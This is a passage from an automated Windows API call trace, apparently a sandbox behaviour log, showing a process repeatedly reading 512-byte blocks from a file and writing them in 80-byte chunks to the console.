lpFileSizeHigh=0x16e228 | out: lpFileSizeHigh=0x16e228*=0x0) returned 0x1632 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.279] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.279] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | 
out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.279] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.279] GetFileType (hFile=0x4c) returned 0x1 [0146.279] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.279] GetFileType (hFile=0x4c) returned 0x1 [0146.279] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.279] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] GetFileType (hFile=0x4c) returned 0x1 [0146.281] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.281] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.282] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.282] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] GetFileType (hFile=0x4c) returned 0x1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.282] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.282] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) 
returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.283] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.283] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.283] GetFileType (hFile=0x4c) returned 0x1 [0146.283] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, 
lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] GetFileType (hFile=0x4c) returned 0x1 [0146.284] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.284] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.285] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.285] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.285] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.285] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: 
hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.286] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.286] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.286] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0146.286] GetFileType (hFile=0x4c) returned 0x1 [0146.286] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.286] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.287] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.287] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.287] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.287] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, 
lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] GetFileType (hFile=0x4c) returned 0x1 [0146.288] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.288] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.289] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.289] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f0b0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f100*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] GetFileType (hFile=0x4c) returned 0x1 [0146.289] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.289] WriteFile (in: hFile=0x4c, lpBuffer=0x16f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f150*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 
0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1a0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f1f0*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f240*, lpNumberOfBytesWritten=0x16e244*=0x20, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.290] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e230 | out: lpNewFilePointer=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.290] ReadFile (in: hFile=0x54, lpBuffer=0x16f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e250, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesRead=0x16e250*=0x200, lpOverlapped=0x0) returned 1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] GetFileType (hFile=0x4c) returned 0x1 [0146.290] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.290] WriteFile (in: hFile=0x4c, lpBuffer=0x16f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e244, lpOverlapped=0x0 | out: lpBuffer=0x16f060*, lpNumberOfBytesWritten=0x16e244*=0x50, lpOverlapped=0x0) 
